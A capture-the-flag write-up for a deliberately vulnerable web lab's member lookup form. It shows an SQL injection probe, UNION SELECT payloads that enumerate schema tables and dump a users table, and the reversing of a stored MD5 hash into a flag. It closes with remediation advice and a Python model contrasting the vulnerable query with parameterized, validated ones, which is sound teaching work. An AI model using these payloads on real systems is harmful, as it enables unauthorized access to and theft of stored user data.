0x0a-sql_injection-members
SQL Injection (MEMBERS)

On the Members page, a form lets you look up a member's information by ID number.

Screenshot (id0to5): the form's answers for IDs 0 to 5.

Let's test whether the page is injectable by submitting a single quote (') as the ID. If a database error like the one below is printed back, the input reaches the query unescaped and the page is vulnerable to SQL injection.

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\'' at line 1

With that error in hand we can try attack queries to pull data out, based on the following:

The MySQL/MariaDB information_schema database describes every database, table and column on the server, so querying it directly reveals the schema. Since the page already selects two columns for the member, a UNION SELECT with two columns can append rows read from information_schema to the normal result. information_schema holds a number of tables; we will use two of them, tables and columns.

The following query lists every table on the server (the constant 1 pads the UNION to the two columns the page selects):

1 AND 1=1 UNION SELECT 1, table_name FROM information_schema.tables

In the returned list of tables, the table users appears.

The same technique over information_schema.columns returns the column names of every table as well:

1 AND 1=1 UNION SELECT table_name, column_name FROM information_schema.columns

Filtering the result for users, the table has the following columns:

user_id, first_name, last_name, town, country, planet, Commentaire, countersign

Trying the columns in turn, the pair Commentaire and countersign yields the message below with this query:

1 AND 1=1 UNION SELECT Commentaire, countersign FROM users

The page echoes the hint and the stored hash in the first-name and surname fields; let's crack the password:

ID: 1 AND 1=1 UNION SELECT Commentaire, countersign FROM users
First name: Decrypt this password -> then lower all the char. Sh256 on it and it's good !
Surname : 5ff9d0165b4f92b14994e5c685cdce28

The surname field is a 32-hex-digit string, the format of an MD5 digest; reversing it (for instance through a hash lookup) gives FortyTwo. Following the hint, convert that string to lowercase and compute its SHA-256 digest:

┌──$ [~/42/2022/darkly]
└─>  echo -n FortyTwo | tr '[:upper:]' '[:lower:]' | openssl dgst -sha256
10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5

Remediation

SQL injection is an attack in which query fragments are injected through input data sent from the client to the application. It lets an attacker read, modify or delete database contents and, in some configurations, run administrative operations on the database server. It happens whenever untrusted input is used to dynamically build the text of a SQL query, as the Members form does with the ID.

To prevent it:

  • Use prepared statements (with parameterized queries)
  • Use properly constructed stored procedures
  • Allow-list input validation
  • Escape all user-supplied input
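As an added example (not the darkly project's code), the following Python script models the Members page end to end: the probe with a single quote, the three UNION payloads used above, and the prepared-statement plus allow-list fixes from the remediation list. It assumes SQLite as a stand-in for MariaDB so it runs offline, so sqlite_master and pragma_table_info play the role of information_schema.tables and information_schema.columns. The database, the first row, the list_images table and every function name are assumptions; only the users column names and the flag row's Commentaire and countersign values come from the page.

```python
import re
import sqlite3

# Values the page's injection returned for the flag row.
FLAG_HINT = "Decrypt this password -> then lower all the char. Sh256 on it and it's good !"
FLAG_HASH = "5ff9d0165b4f92b14994e5c685cdce28"


def build_db():
    """Constructed stand-in for the Members database (assumption: the real app
    runs MariaDB; SQLite is used so this runs offline). The first row and the
    list_images table are made up; the users columns are the ones the page lists."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (
            user_id INTEGER, first_name TEXT, last_name TEXT, town TEXT,
            country TEXT, planet TEXT, Commentaire TEXT, countersign TEXT);
        CREATE TABLE list_images (id INTEGER, url TEXT);
    """)
    db.execute("INSERT INTO users VALUES (?,?,?,?,?,?,?,?)",
               (1, "one", "me", "paris", "france", "EARTH", None, None))
    db.execute("INSERT INTO users VALUES (?,?,?,?,?,?,?,?)",
               (5, "Flag", "GetThe", "42", "42", "42", FLAG_HINT, FLAG_HASH))
    return db


def vulnerable_lookup(db, member_id):
    """What the Members form does: the submitted ID is pasted into the SQL text."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = {member_id}"
    return db.execute(query).fetchall()


def probe(db):
    """Step 1: a lone quote makes the statement unparseable and the database error
    leaks back (MariaDB's reads 'You have an error in your SQL syntax ...')."""
    try:
        vulnerable_lookup(db, "'")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def enumerate_tables(db):
    """Page payload: 1 AND 1=1 UNION SELECT 1, table_name FROM information_schema.tables
    sqlite_master is SQLite's catalog. The constant 1 pads the UNION to two
    columns and also tags the injected rows, so member 1's own row is dropped."""
    rows = vulnerable_lookup(
        db, "1 AND 1=1 UNION SELECT 1, name FROM sqlite_master WHERE type='table'")
    return sorted(name for tag, name in rows if tag == 1)


def enumerate_columns(db):
    """Page payload: 1 AND 1=1 UNION SELECT table_name, column_name FROM information_schema.columns
    pragma_table_info(m.name) is SQLite's equivalent of information_schema.columns."""
    rows = vulnerable_lookup(
        db, "1 AND 1=1 UNION SELECT m.name, p.name FROM sqlite_master m, "
            "pragma_table_info(m.name) p WHERE m.type='table'")
    columns = {}
    for table, column in rows:   # member 1's genuine row appears here as ('one', 'me')
        columns.setdefault(table, set()).add(column)
    return columns


def dump_users(db):
    """Page payload: 1 AND 1=1 UNION SELECT Commentaire, countersign FROM users"""
    return vulnerable_lookup(db, "1 AND 1=1 UNION SELECT Commentaire, countersign FROM users")


def safe_lookup(db, member_id):
    """Remediation: allow-list validation (an ID is ASCII digits only) plus a
    parameterized query, so the value is bound as data and never becomes SQL."""
    if not re.fullmatch(r"[0-9]+", member_id):
        raise ValueError("member id must be a non-negative integer")
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (int(member_id),)).fetchall()


def injection_rejected(db, payload):
    """True when safe_lookup refuses the payload before it reaches the database."""
    try:
        safe_lookup(db, payload)
    except ValueError:
        return True
    return False


def parameterized_only(db, member_id):
    """The placeholder alone, without validation: the payload is compared as a
    string against user_id and matches nothing instead of being executed."""
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (member_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print(probe(db))
    print(enumerate_tables(db))
    print(sorted(enumerate_columns(db)["users"]))
    print(dump_users(db))
    print(injection_rejected(db, "1 AND 1=1 UNION SELECT Commentaire, countersign FROM users"))
```

Note the two layers in the fix: the placeholder by itself already defuses the payload (parameterized_only returns no rows because the string is compared, not parsed), and the allow-list check on top rejects anything that is not a plain integer before a query is even built, which is what the page's ID field should have done.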

See More: